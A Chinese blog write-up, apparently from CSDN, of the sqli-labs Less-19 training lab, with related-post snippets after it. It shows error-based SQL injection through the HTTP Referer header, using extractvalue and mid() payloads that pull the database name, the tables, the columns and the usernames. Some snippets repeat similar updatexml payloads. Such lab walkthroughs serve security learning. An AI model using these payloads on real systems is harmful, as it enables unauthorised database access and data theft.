[网络安全]sqli-labs Less-19 解题详析

最新推荐文章于 2023-08-05 12:38:57 发布
最新推荐文章于 2023-08-05 12:38:57 发布
阅读量2.3k 收藏
点赞数
分类专栏: 网络安全 # Sqli-Labs靶场攻防实战 文章标签: web安全 数据库 sql sqllilabs 网络安全
该原创文章未经本人许可,不得用于商业用途。未经授权不得转载,否则保留追究法律责任的权利。
本文链接:https://blog.csdn.net/2301_77485708/article/details/132053934
版权

姿势

在这里插入图片描述

在这里插入图片描述
由代码审计可知,注入点为HTTP_REFERER,且注入类型为',注入语句)#

该题采用报错注入,原理及姿势参考:报错注入+Sqli-Labs Less-5实战

查库名

测试得到正确的用户名为admin,密码为1,抓包后修改referer为以下POC:

1',extractvalue(1,concat(0x23,database())))#

在这里插入图片描述

得到库名为security

查表名

1',extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema = database()))))#

在这里插入图片描述

查列名

1',extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users'))))#

在这里插入图片描述
得到三个列

查数据

该姿势使用到mid函数,参考文章:mid函数原理、应用及实战讲解

我们以username列为例,利用mid()函数构造POC如下:

1',extractvalue(1,concat(0x23,mid((select group_concat(username) from users),1,32))))#

在这里插入图片描述

接着,我们提取从第 32 个字符开始的长度为 32 的子字符串:

POC如下:

1',extractvalue(1,concat(0x23,mid((select group_concat(username) from users),32,32))))#

在这里插入图片描述
同理即可得到所有的username

总结

以上为[网络安全]sqli-labs Less-19 解题详析,考察报错注入及mid函数的应用,后续将分享 [网络安全]sqli-labs Less-20 解题详析。

我是秋说,我们下次见。

秋说
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs第十九关详解
金 帛的博客
05-05 2316
sqli-labs第十九关详解
SQLi LABS Less-19 报错注入
wangyuxiang946的博客
08-14 1万+
sqlilibs19SQLI-LABS第十九关,sqli-labs十九关 但后面插入HTTP Referer时,并没有对参数进行过滤,我们可以从Referer入手 首先,输入正确的账号和密码,只有账号和密码都正确,才能操作Referer 然后使用代理软件(Burp Suite)拦截POST请求,修改Referer的参数,页面出现了报错信息,接下来即可使用报错注入进行脱库 1' and updatexml(1,0x7e,1) and ' 获...
sqli-lab-less19
Sa1nZen的博客
08-05 85
sqli-lab-less19
SQLilabs的第19关——http请求头注入(Referer)(报错注入)
qq_73393033的博客
07-22 364
该语句表示显示第12个字符后面的12个字符(包括第12个字符)。在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们在截取的数据包中的Referer上加上一个'。我们发现数据没有显示完全,我们还使用mid函数,比如输入语句。它显示了Referer,我们大胆猜测注入点在这里。在进行一次验证,在referer的后面输入。这时就不会报错了,可以确定闭合方式是单引号。这说明闭合方式就是'。
sqli-labs Less 19
m0_60829468的博客
11-05 248
​​​​​​ 一、观察less19,思考 观察less19发现,19关的设定和18关十分相识,细节部分可以看我的18关闯关详细讲解,这里直接开始通关流程。 二、查数据库名 Referer: http://localhost/sqlilabs/Less-19/'and extractvalue(1,concat(0x7e,database(),0x7e)) and ' 三、查询表名 Referer: http://localhost/sqlilabs/Less-19/'and..
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,篡改数据库查询,从而获取、修改、删除敏感数据或控制整个数据库系统。常见的防范措施包括: 1. **参数化查询/预编译语句**:使用预编译语句可以...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 13万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs (less-19)
kukudeshuo的博客
03-11 356
sqli-labs (less-19) 进入19关,输入用户名和密码,发现屏幕回显了我们的IP地址和Referer头,根据18关踩得坑,这里我们可以大胆猜想注入点就在Referer头里 使用burpsuite抓包 抓包后发现,根本就没有Referer头,怎么办呢,没事,我们可以自己添加Referer头,添加完后我们输入’试试 系统报错,验证了我们的猜想,也说明了闭合方式为’ or ‘1’='1,并且为字符型注入 查库 后面的过程与less-18完全一样,具体过程请看我的less-18 ...
sqli-labs (less18-less19)
Xi4or0uji
08-01 1681
less 18 头部注入:user_agent 这里不补充http头的知识了,直接看源码可以看到,uname和passwd都有check_input函数检查,所以直接这两个参数注入是不行的了,然后再继续看下去 有句sql语句有ip_address和uagent两个参数,而且前面没有检查,可以考虑注入,但是ip一般是数字,比较麻烦,所以决定用uagent注入 这里给个脚本,其实重点只是s...
Sqli-labs之Less-18和Less-19
→_→
04-12 3279
Less-18 基于错误的用户代理,头部POST注入 (注:这一个模拟的场景是注册登录后的注入) 由题意可知,这又是一种新姿势,老方法,查找注入点,发现前面的方法都未成功。且错误回显与正确回显都显示IP: 这里写说几个常用请求头:(上一篇文章详细讲过) Host ...
sqli-labs练习(十八、十九、二十、二十一)
wkend的博客
10-14 1061
按照正常思路,先是对username和password输入框进行测试,并没有找到注入点,页面上显示的ip地址也很奇怪,最会无奈查看了源代码,才发现了突破口。 发现后台对uname和passwd有检查过滤函数check_input 于是跟进check_input函数,发现对输入的参数进行了长度限制,纯数字过滤,特殊符号过滤 到现在我们就可以看出,在uname和passwd出已经无法入手,,,,...
sqli-lab19关基于post的referer报错注入
qq_46527080的博客
12-18 424
知识点 referer: http请求头里,有一个referer首部,这个首部可以告知服务端,当前的请求的来源。 就是很直观的说,访问了一个页面,你来自哪里 extractvalue()函数 extractvalue() 函数是对XML文档进行查询的函数 其实就是相当于HTML文件中用 标签查找元素一样 语法:extractvalue(目标xml文档,xml路径) update是更新 extractvalue是查询 第十九关 sqlmap方法: 这里我们还是使用SQLMAP进行注入,将登录请求信息保存到1.
Sqlilabs-19
KAKA的博客
07-09 345
19 关跟第 18 关类似,User-Agent 改成了 Referer 改造注入 –Referer “浏览器向 WEB 服务器表明自己是从哪个网页 /URL 获得/点击 当前请求中的网址/URL” 同样的,这一关对 usernanme 和 password 都进行了 check_input hackbar 制作针对 referer 的 payload: –查表 1' and extractvalue(1,concat(0x7e,(select table_name from information_
sqli-labs19
devilare的博客
01-19 314
sqli-labs19基于referer的SQL注入 来到19题 应该是要在Referer处入手了,抓包单引号闭合一下 出现报错,说明能够进行注入,但是怎么注入呢?看一下源码只插入两个参数,根据18题的基础构造语句查库名’,updatexml(1,concat(0x7e,database(),0x7e),1))# 接下来就是常规操作了 Git it! ...
sqli-labs less 19 POST- Header injections - Referer field -error based
Monster1m的博客
01-25 121
一、提示referer的头注入,和上一关基本一样。先看源码呗 1.又对uname和passwd使用了check_input函数进行了过滤,所以只能找其他注入点 2.这里对uagent赋值了referer的内容而且没有进行过滤,之后只要找到哪里的数据库语句有用到uagent 3.这里发现insert语句用到了uagent,确定注入点,并且是单引号闭合。和上一关一样因为先进行了select查询,所以在注入时必须输入有效的用户名和密码 4.这里也有输出数据库错误信息,所以选择用报错注入 二、打开bp开启拦
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏,祝你平安喜乐。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值